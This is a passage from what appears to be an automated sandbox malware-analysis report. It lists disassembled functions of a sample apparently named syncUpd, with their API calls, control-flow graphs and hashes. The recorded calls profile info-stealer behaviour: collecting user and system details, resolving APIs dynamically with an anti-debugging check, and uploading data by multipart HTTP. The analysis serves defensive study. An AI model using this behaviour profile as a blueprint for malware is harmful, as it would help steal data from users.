                                                                                                                                                                                                                                                              • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ce118d042685daf90d7a6eff965731848e3dabe9ba4ff9ecad4140c240380c2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00964808,00000000,?,0041D758,00000000,?,00000000,00000000,?,00964FC8,00000000), ref: 004144C0
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                                                                              • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                                              • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 752954902-0
                                                                                                                                                                                                                                                              • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                                              • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941180), ref: 00415F11
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941198), ref: 00415F2A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941360), ref: 00415F42
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009413A8), ref: 00415F5A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941390), ref: 00415F73
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C7E0), ref: 00415F8B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C0D8), ref: 00415FA3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C098), ref: 00415FBC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941378), ref: 00415FD4
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009413C0), ref: 00415FEC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009413D8), ref: 00416005
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009413F0), ref: 0041601D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BD78), ref: 00416035
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941408), ref: 0041604E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00941348), ref: 00416066
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C018), ref: 0041607E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D760), ref: 00416097
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D880), ref: 004160AF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BD58), ref: 004160C7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D748), ref: 004160E0
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C038), ref: 004160F8
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0095D868,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0095D5C8,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0095D5E0,?,004136C0), ref: 0041612D
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0095D7D8,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0095D6E8,?,004136C0), ref: 00416150
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,0095D640), ref: 00416172
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095D700), ref: 00416193
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095D838), ref: 004161AB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095D7A8), ref: 004161CD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E50000,0095BE18), ref: 004161EE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76E80000,0095C7F0), ref: 0041620F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                              • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                                                              • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                              • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 44 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 67 404ee3 44->67 68 404eea-404eee 44->68 67->68 69 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 68->69 70 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 68->70 69->70 133 40500d-40501b 69->133 134 405029 133->134 135 40501d-405027 133->135 136 405033-405065 HttpOpenRequestA 134->136 135->136 137 40556b-405572 InternetCloseHandle 136->137 138 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 136->138 137->70 292 4054ea-405514 InternetReadFile 138->292 293 405516-40551d 292->293 294 40551f-405565 InternetCloseHandle 292->294 293->294 295 405521-40555f call 416fb0 call 416ea0 call 416e00 293->295 294->137 295->292
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 00404ED9
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,0095DC20,?,00965658,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0095DCA0,00000000,?,0095FEE0,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                                              • String ID: ------$"$"$"$--$------$------$------$8me
                                                                                                                                                                                                                                                              • API String ID: 2633831070-4183386520
                                                                                                                                                                                                                                                              • Opcode ID: 621bdba30baf4891ab83dce99178415b5fbd469afe96ca80ea55588cdf1fe0f4
                                                                                                                                                                                                                                                              • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 621bdba30baf4891ab83dce99178415b5fbd469afe96ca80ea55588cdf1fe0f4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493networkstringmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 303 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 318 4056d4-4056d8 303->318 319 4056cd 303->319 320 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 318->320 321 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 318->321 319->318 330 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 320->330 331 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 320->331 321->320 405 40585c-40586a 321->405 331->330 406 405878 405->406 407 40586c-405876 405->407 408 405882-4058b5 HttpOpenRequestA 406->408 407->408 409 405c63-405c6a InternetCloseHandle 408->409 410 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 408->410 409->320 519 405be2-405c0c InternetReadFile 410->519 520 405c17-405c5d InternetCloseHandle 519->520 521 405c0e-405c15 519->521 520->409 521->520 522 405c19-405c57 call 416fb0 call 416ea0 call 416e00 521->522 522->519
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 004056C3
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,0095DD00,00000000,?,0095FEE0,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,0095DC20,?,00965658,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                                              • String ID: "$"$------$------$------$8me$-A$-A
                                                                                                                                                                                                                                                              • API String ID: 148854478-3677574302
                                                                                                                                                                                                                                                              • Opcode ID: d17a967b76ce1ee735f1f47082f8f9b027be3ac0b8b0cfcc2167a6bfdfd9e736
                                                                                                                                                                                                                                                              • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
